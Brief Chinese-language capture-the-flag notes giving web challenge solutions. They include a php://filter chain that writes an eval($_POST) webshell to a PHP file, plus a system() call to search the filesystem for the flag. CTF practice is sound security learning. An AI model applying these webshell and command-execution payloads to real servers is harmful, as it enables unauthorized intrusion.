不泄露wp每晚9点更新
热身?f=phpinfo();
在里面找到secret文件,里面有flag
web1?content=php://filter/<?|string.strip_tags|convert.base64-decode/resource=?>PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B/../3.php
PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B ----->PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+ -----><?php eval($_POST[1]);?>
1=system("find / -name fl*");在/flag.txt
web2Postsession_id=session_idcookiePHPSESSID=HappyNewYear
web3?1=error_reporting
web4?1=spl_autoload_extensions
web5 很多个hu使其溢出
我用hackbar不行
看群主用burp suite
有点气呜呜呜